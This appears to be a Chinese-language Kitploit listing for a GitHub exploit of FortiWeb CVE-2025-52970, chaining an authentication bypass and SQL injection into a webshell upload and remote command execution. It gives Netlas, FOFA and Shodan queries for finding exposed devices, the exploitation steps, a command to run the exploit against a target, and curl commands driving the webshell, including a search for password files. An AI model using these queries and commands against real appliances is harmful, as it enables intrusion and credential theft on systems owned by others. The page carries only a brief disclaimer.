Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
FortiWeb-CVE-2025-52970-Authentication-Bypass — 演示了 FortiWeb 中的身份验证绕过(CVE-2025-52970)与 SQL 注入链式利用,通过 HTTP 头上传 WebShell 并实现远程代码执行。 | Kitploit
工具/GitHubGitHub/hex00-0x4/fortiweb-cve-2025-52970-authentication-bypass
身份验证与授权漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubhex00-0x4/fortiweb-cve-2025-52970-authentication-bypass

FortiWeb-CVE-2025-52970-Authentication-Bypass

演示了 FortiWeb 中的身份验证绕过(CVE-2025-52970)与 SQL 注入链式利用,通过 HTTP 头上传 WebShell 并实现远程代码执行。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
93131年前尚未审核

🚨 FortiWeb 认证绕过 → 远程代码执行

📌 概述

本仓库演示了 FortiWeb 中的认证绕过,该绕过可被串联利用以实现 远程代码执行 (RCE)。
该利用程序借助一个存在漏洞的端点来注入 SQL 载荷、上传 WebShell,并通过 HTTP 标头执行命令。

⚠️ 免责声明:
本项目仅用于教育和研究目的。
请勿在您不拥有或未经明确授权测试的系统上使用本工具。

Netlas、FOFA 与 Shodan

Screenshot 2025-08-23 131226
root@kitploit:~
((FortiWeb)) AND port:("8443")

### FOFA
title="FortiWeb" && port="8443"

### Shodan
ssl:"FortiWeb" port:8443
http.title:"FortiWeb" port:8443

🔎 漏洞详情

  • CVE:CVE-2025-52970

  • 组件:FortiWeb Fabric API(/api/fabric/device/status)

  • 影响:认证绕过 → SQL 注入 → WebShell 上传 → RCE

  • 攻击向量:精心构造的 Authorization 标头 + SQL 注入

🧑‍💻 利用流程

  1. 删除并创建临时 SQL 表。

  2. 分块写入 WebShell 载荷。

  3. 将 Shell 导出至 /cgi-bin/x.cgi。

  4. 上传辅助 Python 脚本以触发权限设置。

  5. 通过 User-Agent 标头发送命令来访问 WebShell。

    ⚙️ 使用方法

1️⃣ 克隆仓库

root@kitploit:~
git clone https://github.com/your-username/Fortinet-AuthBypass-Exploit.git
cd Fortinet-AuthBypass-Exploit
python3 exploit.py -t https://TARGET:8443/

Screenshot 2025-08-23 114753 Screenshot 2025-08-23 114915

3️⃣ 与 WebShell 交互

root@kitploit:~
curl -ks -H 'User-Agent: id' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: whoami' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: uname -a' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: grep -ril pass /etc /conf /data 2>/dev/null' https://TARGET:8443/cgi-bin/x.cgi
Screenshot 2025-08-23 114521
下载工具